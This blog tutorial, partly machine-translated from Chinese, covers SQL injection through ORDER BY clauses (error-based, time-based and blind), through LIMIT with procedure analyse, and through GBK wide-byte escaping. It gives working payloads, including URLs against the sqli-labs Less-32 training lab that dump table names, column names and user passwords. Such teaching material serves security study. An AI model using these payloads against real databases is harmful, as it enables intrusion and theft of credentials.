当前位置:网站首页>SQL injection base - order by injection, limit, wide byte
SQL injection base - order by injection, limit, wide byte
2022-08-10 23:49:00 【Hold the kitten】
目录
(1)order by Injection exists for a reason
(2)案例1:Use error reporting function injection
(3)案例2:Use the delay function injection
(2)Escape functions are common in wide bytes
order by
(1)order by Injection exists for a reason
order by 子句在MySQLcan guess the number of columns in the table,再配合union select语句进行回显.
但是,当页面出现MySQL报错信息时,且order byFollowed by controllable parameters,At this point, you can use the error message for injection
(2)案例1:Use error reporting function injection
select * from users order by updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1);
(3)案例2:Use the delay function injection
select * from users order by if(concat(0x7e,user(),0x7e),1,sleep(3));
Latency is not3秒,It is the number of data items queried*3=total delay time
当SQLThere is a delay when the statement is true,SQLWhen the statement is false it is displayed in normal time.
(4)案例3:利用rand()盲注
rand()The random number generated by the function is 0到1之间,但是当给rand()function with one parameter,This parameter becomes a seed,generated from this seed0到1The random number between is fixed
我们发现rand()参数为0或1时,We test again using Boolean blinds
select * from users order by rand(ascii(mid((select database()),1,1))=8);
(5)案例4:if进行盲注
当ifThe output is out of order when the statement is valid,当ifThe output does not change order when the statement is invalid.
limit注入
(1)limit使用介绍
limit[位置偏移量,]行数:Position offset refers toMySQLThe function that Query Analyzer starts to display,The number of rows refers to the number of records returned.
基本使用: select * from users limit 1,4;
在limitIt can be followed by two functions,procedure 和 into,intounless writtenshell的权限,Otherwise it is not available,Then we can do itprocedure找突破口.
benchmark函数有两个参数,第一个是执行次数,The second is the function or expression to test
比如 benchmark(10000000,函数(1))
Means to execute the expression10000000次, 使mysqlThe increase in the amount of computation results in a delay,Similar to multi-table joint query/笛卡尔积.
(2)案例
select * from users limit 1 procedure analyse(extractvalue(rand(),concat(0x3a,benchmark(10000000,user()))),1);
宽字节注入
(1)什么是宽字节?
The character size of a wide byte is two bytes,像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,Note that all English occupy one byte by default,中文占用两个字节.
(2)Escape functions are common in wide bytes
addslashes() 函数:返回在预定义字符之前添加反斜杠的字符串
mysql_real_escape_string() 函数:转义 SQL 语句中使用的字符串中的特殊字符
mysql_escape_string() 函数:转义一个字符串
(3)案例:sqli-labs第32关
It can be seen that the single quotes are escaped,查看源码
我们在1的后面加上%df
1、那为什么加上%dfJust escape the single quotes?
这涉及到了mysql的特性,因为gbk是多字节编码,他认为两个字节代表一个汉字,所以%df和后面的\
也就是%5c变成了一个汉字“運”,而单引号逃逸了出来.
2、但是MySQLHow to judge characters or Chinese characters?
根据gbk编码,第一个字节ascii码大于128,Basically it can be judged.比如我们将%df换成%a1
In this way, after the single quotes are escaped, we can query the data in the database
1、获得数据库中的表
http://127.0.0.1/sqli/Less-32/?id=-1%a1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
2、获得users表中的字段
http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273)--+
3、Get user and user password
http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(username,password)%20from%20security.users)--+
边栏推荐
- 后疫情时代,VR全景营销这样玩更加有趣!
- How to quickly grasp industry opportunities and introduce new ones more efficiently is an important proposition
- 6.0深入理解MySQL事务隔离级别与锁机制
- u盘数据不小心删除怎么恢复,u盘数据删除如何恢复
- ROS Experiment Notes - Validation of UZH-FPV Dataset
- Kubernetes 选举机制HA
- HGAME 2022 Week3 writeup
- DASCTF 2022 7月赋能赛 writeup
- Timers, synchronous and asynchronous APIs, file system modules, file streams
- CSAPP lab
猜你喜欢
随机推荐
call,apply,bind指定函数的this指向详解,功能细节,严格和非严格模式下设定this指向
服务器上行带宽和下行带宽指的是什么
C3604环保黄铜带
Geogebra 教程之 02 Geogebra初学者的 8 个基本要素
11. 自定义转换器
安科瑞为工业能效行动计划提供EMS解决方案-Susie 周
花环灯问题
Rust从入门到精通05-语句和表达式
Kubernetes 选举机制HA
虎符CTF 2022 Quest-Crash Writeup
Deep Learning Transformer Architecture Analysis
HCTF 2018 WarmUP writeup
mysql数据库高级操作
7. yaml
[C] the C language program design, dynamic address book (order)
DASCTF X SU 2022 writeup
The Missing Semester of Your CS Education
CSAPP lab
HGAME 2022 复盘 writeup
MySQL数据库基础操作